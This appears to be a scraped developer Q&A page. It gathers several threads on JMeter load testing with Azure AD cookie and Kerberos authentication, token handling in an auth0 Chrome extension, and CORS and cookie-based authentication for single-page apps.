I'm new to JMeter and trying to create test case.The application is using OAuth 2.0 azure active directory authentication,I followed one the post https://blog.pnop.co.jp/jmeter-webapps-azuread-auth_en/ and was able to do http request to app but in return I'm getting below error:
We can't sign you in
Your browser is currently set to block cookies. You need to allow cookies to use this service.
Cookies are small text files stored on your computer that tell us when you're signed in. To learn how to allow cookies, check the online help in your web browser.
I took care of CookieManager.save.cookies=true in user.properties but still cookies are giving me hard-time though I could see cookies populating in request header being sent
If someone have a crack of similar scenario then that would be great help
Thanks
Have you added HTTP Cookie Manager to your test plan?
If yes and you're still experiencing problems try:
Checking jmeter.log file for any suspicious entries
Choose a more "relaxed" implementation for the cookie manager, i.e. netscape
Add the next line to user.properties file:
CookieManager.check.cookies=false
JMeter restart will be required to pick up the change
More information: HTTP Cookie Manager Advanced Usage - A Guide
Related
I am trying to load test an application which uses azure AD B2C authentication. I have replicated all requests. However there is authorize endpoint which when inspected in browser I can see few cookies from response header.
This has openidconnect cookie, another couple of cookies. However when running this request in jmeter, I can see only openidconnect cookie but not others.
I need to send other cookies in subsequent request. I have cookie manager and also turned on save cookie flag in user.properties and jmeter.properties files.
Any help is much appreciated.
Most probably it indicates some problem with cookies, i.e. domain/path mismatch or the cookie is expired or something like this so it sounds like your system under test issue.
If you don't care about correctness of functional behaviour of your application and just want to send all the incoming cookies no matter of their validity - you can try the following workarounds:
Disable JMeter's mechanism for checking cookies so everything will be stored in the Cookie Manager no matter if there are any issues. It can be done by adding the next line to user.properties file:
CookieManager.check.cookies=false
Switch to less restrictive implementation, i.e. netscape in the HTTP Cookie Manager itself:
More information: HTTP Cookie Manager Advanced Usage - A Guide
You can also enable debug logging for the Cookie Manager by adding the next line to log4j2.xml file:
<Logger name="org.apache.jmeter.protocol.http.control" level="debug" />
once done you will be able to see what's going on with each and every incoming/outgoing cookie in jmeter.log file
I've seen a few posts on this but I want to highlight some specific questions I have yet to see properly answered.
My current chrome extension contains the following:
background service worker
html pages to handle login / logout (although doing this in a popup would be great)
content scripts that run a SPA on certain domains
What I would like is for a user to be able to authenticate with auth0, and then any content script running on any domain can then use an access token to hit my API.
The current challenges I've been seeing that I'm not sure how to tackle:
Ideally each running content script has its own token. This involves using the auth0 session to silently get an access token. However, since auth0 checks the origin when hitting /authorize it would mean registering every domain as an "allowed origin" which is not possible for me due to volume. Currently if I try just setting the redirectURI to my chrome extension URL, it ends up timing out. I have seen some users report this approach working, so I'm not sure if I'm doing something wrong or not, but this approach feels unsafe in retrospect.
If I instead funnel my requests through the background script, so all running content scripts effectively use a single access token, how do I refresh that access token? The documentation recommends making a call to /oauth/token which involves the client secret. My guess is this is not something I should be putting into my javascript as all of that is visible to anyone who inspects the bundle. Is that a valid concern? If so, what other approach do I have?
If I do use a manually stored refresh_token, what is the best way to keep that available? The chrome storage API says not to use it for sensitive information. Is it preferred then to keep it in local storage?
If the best option is to have the background script make all the requests on behalf of the content scripts, what is the safest way for the content scripts to make a request through the background script? I would rely on chrome.runtime.sendMessage but it seems like the API supports arbitrarily sending messages to any extension, which means other code that isn't part of the extension could also funnel requests through the background script.
More generally, I would love to hear some guidance on a safe architecture to authenticate users for a multi-domain extension.
I am also not adverse to using another service, but from what I've seen so far, auth0 offers relatively good UX/DX.
I am trying to record an internal website for which i need to enter credentials that is not same as the windows credential. Later on the same test needs to be run for more than one user. i know how to use the csv file to pass the parameters - username and password.
For Windows Authentication i have added Authorization manager.
From Fiddler i checked it was NTLM authentication(though i am not sure yet) and i did enter the values for NTLM authentication in Authorization Manager.
Now when i try and record the internal website - i cannot even go to homepage after the windows credentials, it keeps on spinning.
When i check the Authorization Manager, i find an extra line added for kerberos Authentication as shown in Picture:
My query here is:
1)why is it recording it as kerberos
2)where is it saving the username and password
3)why is it not loading the website- always keeps spinning and i have to stop it
4)I have tried Kerberos settings and then record, but its not working either , could it be i am using the wrong values in the kerb5.conf file , how do i debug.
Kind of stuck at the moment.
Thanks for help!
If you're uncertain what authentication is being used under the hood - just ask around, application developers or network administrators should be aware of the external authentication scheme. You can also try using a 3rd-party tool like Kerberos Authentication Tester
I don't think you can record and replay Windows authentication so it makes sense to start recording some time after the login screen as long as you can login using JMeter
Looking into JMeter source
// if HEADER_AUTHORIZATION contains "Basic"
// then set Mechanism.BASIC_DIGEST, otherwise Mechanism.KERBEROS
In case of Kerberos credentials are saved directly in the HTTP Authorization Manager in form of ${AUTH_LOGIN} and ${AUTH_PASSWORD}, real credentials are not stored anywhere
Most probably your application doesn't receive valid authentication context therefore it cannot proceed
Add sun.security.krb5.debug=true line to system.properties file (lives in "bin" folder of your JMeter installation), JMeter restart will be required to pick the property up.
More information:
Windows Authentication with Apache JMeter
JAAS and Java GSS-API Tutorials
The situation
I am writing a Single-Page-Web App (using Angular). Lets call it SPA
Another team-mate is writing some APIs (using Node.js). Lets call is Server
My SPA is to Login to the Server using login/passwd, and do some stuff
My team-mate has decided to use cookies to track the session. Hence, upon a successful login, a http-only cookie is to be set in the web-browser the SPA is loaded in.
The problem
If we put the SPA in the Server's public_html dir, all works well. This, however, makes the SPA as a part of the API code. This breaks our build process, since every version upgrade to the SPA now requires upgrading the API too.
If we host the SPA in a seperate webserver that only serves the static SPA files, I run into CORS issues. Since the SPA comes from a different origin than the APIs it is trying to access, the browser blocks the ajax calls. To overcome this, we will have to set Access-Control-Allow-Origin on the server side appropriately. I also understand that Access-Control-Allow-Credentials:true needs to be set, to instruct the browser to set/send the cookies.
Possible solutions
We create a build process which does a git-pull to the Server's public_html dir every time the SPA gets upgraded. I am trying to avoid this to keep the client and server upgrades separate.
We create a proxy kind of situation, where the Server doesnt store the SPA files, but collects them on-demand from another server that hosts the SPA files. In this case, the web-browser will see the SPA files and subsequent ajax calls from the same origin.
We code the server to set Access-Control-Allow-Origin:* in its responses. Firstly, this is too open and looks insecure. Is it really insecure, or is it just my perception? Also, since we are setting Access-Control-Allow-Credentials:true, Chrome complains Cannot use wildcard in Access-Control-Allow-Origin when credentials flag is true.. To overcome this, we will have to put exact origins (perhaps using a regex) in the Access-Control-Allow-Origin. This may seriously restrict us from distributing our SPA to users in unknown domains.
For a Server API designer, is Cookie based authentication the recommended way to handle Authentication for SPAs? OAuth2.0 and JWT based Authentication seems to suggest that Cookies based Authentication is not right for SPAs. Any pros/cons?
Kindly comment on the above options, or suggest any others that you may have used. Thanks in advance.
I think the issue is that your terminology is confusing. API is not an server, its an application that lives on a machine that can also be a server. If you make a NodeJS API, I suggest you use a Nginx server as a reverse proxy before it. Assuming you want the Nginx server, API and SPA files all on same machine, you can deploy your API to a directory and your SPA to another directory and have Nginx route the requests accordingly.
So I believe solution 2 is way to go. From there you can easily scale by increasing number of instances(if you use AWS) and load balance them or separate your API into its own application server.
As far as authentication. I have always preferred using Header Authorization with access tokens over cookies for SPA or API request. The idea that each request is self contained and does not require a persistent string kept on the browser is more appealing to me, though you can save access token via local storage.
I would go with either solution 2 or 3.
2: you could set both (webpage and API) on the same server (or use reverse proxies) so that from an outside perspective they share the same origins.
3: in the case of an API, the same origin policy becomes less important. The API is to be consumed by clients that are not part of your web application anyways, no?
I would not see any issue in setting a more lax allow origin header. And by more lax I don't mean wildcard, just add the origin of your webpage. Why do you want to wildcard it?
as far as i know 'Access-Control-Allow-Origin' is used as part of CORS to limit which all hosts can request data from a given api server. This flag/variable value is set by the server as part of a response.
I did happen to stumble upon this chrome extension which says:
Allow to you request any site with ajax from any source. Add to
response - 'Access-Control-Allow-Origin: *' header
Developer tool.
Summary Add to response header rule - 'Allow-Control-Allow-Origin: *'
Hint Same behavior you can get just using chrome flags [http://www.chromium.org/developers/how-tos/run-chromium-with-flags]
chrome --disable-web-security
or
--allow-file-access-from-files --allow-file-access --allow-cross-origin-auth-prompt
so that means from the client side I can change the response header. So it means that if i set on server : 'Access-Control-Allow-Origin : http://api.example.com' this setting can be overwritten by client 'Access-Control-Allow-Origin : *'. or may be I do not want to support cors - so i dont set it, but this will still show as if I do support CORS.
If that is the case, what is the point in having my server side setting?? isn't that left redundant??
May be I am being too naive here, and not getting the basics of it.
CORS is a security feature to protect clients from CORF, or Cross Origin Request Forgery. It is not intended to secure servers, as a client can simply choose to ignore them.
An example of CORF would be visiting a website, and client-side code on that website interacts with another website on your behalf, do things like submitting data to a website, or reading data that requires authentication as you, all with your active authentication sessions.
Theoretically, without CORS, it would be possible to create a website that will fetch your email from a webmail provider (provided you are logged in at the time), and post it back to a server for malicious individuals to read.
To avoid this, you shouldn't browse the web with such security features disabled. It's available to ease development, not for general browsing.